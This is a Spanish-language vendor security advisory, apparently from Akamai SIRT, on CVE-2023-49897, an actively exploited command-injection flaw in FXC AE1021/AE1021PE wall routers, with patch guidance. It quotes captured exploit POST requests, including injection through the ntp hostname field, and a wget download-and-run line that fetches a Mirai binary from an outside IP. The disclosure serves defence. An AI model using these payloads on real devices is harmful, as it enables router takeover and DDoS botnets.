Vulnerabilidad explotada de forma activa en routers FXC: corregida, parches disponibles
Esta entrada de blog es una actualización de una publicación anterior realizada por el equipo SIRT sobre la campaña InfectedSlurs .
Resumen ejecutivo
El equipo de respuesta a incidentes e inteligencia en seguridad (SIRT) de Akamai ha publicado una actualización de la serie de avisos sobre infectedSlurs ahora que uno de los proveedores afectados ha publicado versiones del firmware con parches aplicados y directrices.
Se ha asignado a la vulnerabilidad el ID de CVE CVE-2023-49897 con una puntuación de CVSS v3 de 8,0 .
Entre los routers afectados se encuentran los routers de pared con toma de corriente Future X Communications (FXC) AE1021 y AE1021PE, que ejecutan el firmware 2.0.9 y versiones anteriores.
Las cargas útiles maliciosas capturadas en el mundo real instalan un malware basado en Mirai con la intención de crear una botnet de ataques distribuidos de denegación de servicio (DDoS) .
Hemos proporcionado una amplia lista de indicadores de compromiso (IOC), reglas de Snort y reglas de YARA en la investigación original para ayudar a identificar estos intentos de explotación en el mundo real y posibles infecciones activas en redes de defensores.
Lo que necesita saber
Como parte del descubrimiento de InfectedSlurs, SIRT detectó una vulnerabilidad en los routers de pared con toma de corriente FXC AE1021 y AE1021PE que se están explotando activamente. Este dispositivo se describe como un router LAN inalámbrico basado en toma de corriente para hoteles y unidades residenciales. Fabricado por FXC en Japón. A esta vulnerabilidad se le ha asignado el ID CVE-2023-49897 de CVE con una puntuación de CVSS v3 de 8,0.
Esta vulnerabilidad permite que un atacante autenticado consiga inyectar comandos del sistema operativo con una carga útil que se entrega a través de una solicitud POST a la interfaz de gestión. En su configuración actual, utiliza las credenciales predeterminadas del dispositivo en las cargas útiles capturadas.
Las versiones de firmware afectadas son:
Versión 2.0.9 y anteriores del firmware de AE1021PE
Versión 2.0.9 y anteriores del firmware de AE1021
El proveedor (FXC) ha publicado una versión con parches aplicados del firmware del dispositivo que corrige la vulnerabilidad. El proveedor sugiere a los propietarios de los dispositivos que actualicen a la versión de firmware 2.0.10 lo antes posible. También recomienda a los propietarios realizar un restablecimiento de fábrica del dispositivo y cambiar la contraseña de inicio de sesión predeterminada de la pantalla de gestión en el primer arranque.
El aviso del proveedor se puede encontrar en https://www.fxc.jp/news/20231206 con un aviso que también está publicando JPCERT, y que se encuentra aquí https://jvn.jp/en/vu/JVNVU92152057/ (Versión para Japón: https://jvn.jp/vu/JVNVU92152057/).
Explotación observada
Las cargas útiles identificadas en el mundo real implican la instalación de un malware basado en Mirai. La campaña está creando una botnet cuyo objetivo es facilitar los ataques DDoS. La botnet en sí se trató con todo detalle en nuestra primera publicación.
Es difícil estimar cuántos dispositivos del mundo real están potencialmente comprometidos o comprometidos de forma activa porque las cargas útiles de ataque capturadas dependen del uso de credenciales de autenticación predeterminadas de fábrica por parte de los dispositivos.
Dado que el atacante debe autenticarse, se han observado dos interacciones únicas generadas por el atacante. Creemos que la primera de estas interacciones es simplemente un intento de detectar la huella digital. La interacción se dirige a la URL de terminal /cgi-bin/login.apply que utiliza las credenciales predeterminadas (Figura 1).
URL: /cgi-bin/login.apply
Cookie: cookieno=489646; username=[redacted]; password=[redacted]
User-Agent: Go-http-client/1.1
POST BODY:
username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]
Fig. 1: Intento de autenticación del router de pared con toma de corriente FXC
Si la autenticación se realiza correctamente, se entrega una carga útil de explotación a la URL de terminal /cgi-bin/action aproximadamente tres segundos más tarde (Figura 2).
URL:/cgi-bin/action
Cookie: username=[redacted]; password=[redacted]; cookieno=489646
User-Agent: Go-http-client/1.1
POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
Fig. 2: Intento de explotación del router de pared con toma de corriente FXC
Cargas útiles de explotación sin formato capturadas en el intento en el mundo real de aprovechar la vulnerabilidad de inyección de comandos del sistema operativo para distribuir una variante compilada por MIPS de Mirai (Figura 3).
cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge
Fig. 3: Cargas útiles de ejecución remota de código observadas en el mundo real
En nuestra publicación inicial, el equipo SIRT de Akamai proporcionó una amplia lista de indicadores de riesgo (IOC), reglas de Snort y reglas de YARA para ayudar a identificar estos intentos de explotación en el mundo real y las posibles infecciones activas en redes de defensores.
Conclusión
Las campañas dirigidas al Internet de las cosas (IoT) dan lugar a innumerables casos en las que los dispositivos de consumo diarios son reclutados inadvertidamente en una serie de iniciativas maliciosas. Las botnets DDoS y los esquemas de criptominería son solo algunos de los posibles resultados que pueden producirse sin que el consumidor cuyo dispositivo se ha visto afectado tenga conocimiento alguno. En algunos casos, es posible que el usuario ni siquiera sepa que las credenciales se pueden cambiar en estos dispositivos.
Esta revelación subraya la necesidad de aumentar la concienciación y de informar sobre las prácticas recomendadas de IoT y los riesgos asociados para el consumidor medio. La necesidad de concienciación no es exclusiva de los consumidores, ya que también se aplica a los fabricantes de estos dispositivos de tipo "configurarlo y olvidarse".
Las prácticas básicas de seguridad son importantes
Lo básico importa. Estas observaciones subrayan una vez más la importancia de las prácticas recomendadas de seguridad básicas, como cambiar las contraseñas predeterminadas en los dispositivos durante la configuración inicial. También destacan la importancia de implementar protocolos de seguridad proactivos a largo plazo aún más estrictos, como garantizar una actualización uniforme de los sistemas como protección frente a posibles ataques y, ocasionalmente, comprobar los sistemas/dispositivos, especialmente si muestran un comportamiento extraño.
No se lo pierda
El grupo de inteligencia sobre seguridad de Akamai seguirá supervisando amenazas como estas e informando sobre ellas para concienciar a nuestros clientes y a la comunidad de seguridad en general. Para obtener más información, síganos en X, antes conocido como Twitter, para estar al día de lo que descubrimos.
El equipo SIRT de Akamai desea dedicar un momento a agradecer a CISA, US-CERT, JPCERT y FXC su asistencia en las comunicaciones, la coordinación, la identificación, la corrección y los esfuerzos de divulgación.
También queremos dar las gracias a Ryu Kuki, Takayuki Sasakiy Katsunari Yoshioka de la Universidad Nacional de Yokohama por su diligente labor. Aunque no hemos podido trabajar con ellos directamente, nos llamó la atención que hubieran informado de la misma vulnerabilidad a JPCERT y FXC casi al mismo tiempo que nuestros propios informes. Siempre es fantástico encontrar compañeros defensores que desempeñan un papel activo para hacer de Internet un lugar mejor y más seguro para todos.
